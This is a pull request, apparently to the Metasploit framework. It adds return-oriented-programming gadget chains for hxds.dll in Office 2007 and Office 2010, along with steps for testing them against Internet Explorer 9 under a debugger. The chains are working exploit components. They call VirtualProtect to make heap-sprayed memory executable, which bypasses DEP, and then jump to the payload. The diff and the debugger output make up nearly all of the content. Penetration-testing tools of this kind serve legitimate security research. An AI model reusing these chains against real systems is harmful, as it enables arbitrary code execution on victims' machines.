### PR TITLE
Add ROP chains for Office 2007 and Office 2010 (hxds.dll)

### DIFF
--- a/data/ropdb/hxds.xml
+++ b/data/ropdb/hxds.xml
@@ -1,0 +1,66 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+<rop>
+	<compatibility>
+		<target>2007</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x000750fd">POP EAX # RETN</gadget>
+		<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0001803c">POP EBP # RETN</gadget>
+		<gadget offset="0x0001803c">skip 4 bytes</gadget>
+		<gadget offset="0x0001750f">POP EBX # RETN</gadget>
+		<gadget value="fffffdff">0x00000201</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
+		<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x000406e9">POP ECX # RETN</gadget>
+		<gadget offset="0x0008bfae">Writable location</gadget>
+		<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
+		<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
+		<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c840">JMP [EAX]</gadget>
+		<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
+		<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
+	</gadgets>
+</rop>
+
+<rop>
+	<compatibility>
+		<target>2010</target>
+	</compatibility>
+
+	<gadgets base="0x51bd0000">
+		<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
+		<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
+		<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
+		<gadget value="fffffdff">0x00000201</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
+		<gadget offset="0x0002a429">POP EDX # RETN</gadget>
+		<gadget value="ffffffc0">0x00000040</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
+		<gadget offset="0x0008c638">Writable location</gadget>
+		<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
+		<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
+		<gadget offset="0x00073335">POP ESI # RETN</gadget>
+		<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
+		<gadget offset="0x00076452">POP EAX # RETN</gadget>
+		<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
+		<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
+</gadgets>
+</rop>
+</db>


### PR DESCRIPTION
This adds two ROP chains for Office 2007 and Office 2010 based on hxds.dll. It is for the following redmine ticket:
http://dev.metasploit.com/redmine/issues/8434

I don't really have a pretty way to test them, except for doing a real spray in memory, and then manually playing with it with a debugger.

First I start with this test script:
https://gist.github.com/wchen-r7/6774619

And then I do these:
- [ ] Start IE (in my case I run IE9 on Win 7 SP1)
- [ ] Attach debugger to IE (I use ImmDBG in this case)
- [ ] Start msfconsole and run the test module
- [ ] In the browser, go to the link provided by the module. This should spray the ROPs in memory.
- [ ] Pause the debugger.
- [ ] If you're using Office 2007, modify ESP to 0x20302020. If 2010, modify to 0x203020DC.
- [ ] Modify EIP to some RET instruction that's executable. The RET should point to the first gadget of the ROP.
- [ ] Step through the ROP chain. Make sure you're executing VirtualProtect with success (EAX=0), and that it returns to a bunch of 0x90s as the fake payload.  The 0x90s should be executable too.

For your reference, in Office 2007, the VirtualProtect should have these arguments:

```
20302044   FFFFFFFF  ÿÿÿÿ  |hProcess = FFFFFFFF
20302048   20302074  t 0   |Address = 20302074
2030204C   00000201  ..  |Size = 201 (513.)
20302050   00000040  @...  |NewProtect = PAGE_EXECUTE_READWRITE
```

In Office 2010, the arguments would look like:

```
20302108   FFFFFFFF  ÿÿÿÿ  |hProcess = FFFFFFFF
2030210C   20302138  8!0   |Address = 20302138
20302110   00000201  ..  |Size = 201 (513.)
20302114   00000040  @...  |NewProtect = PAGE_EXECUTE_READWRITE
20302118   51C5C638  8ÆÅQ  \pOldProtect = hxds.51C5C638
```
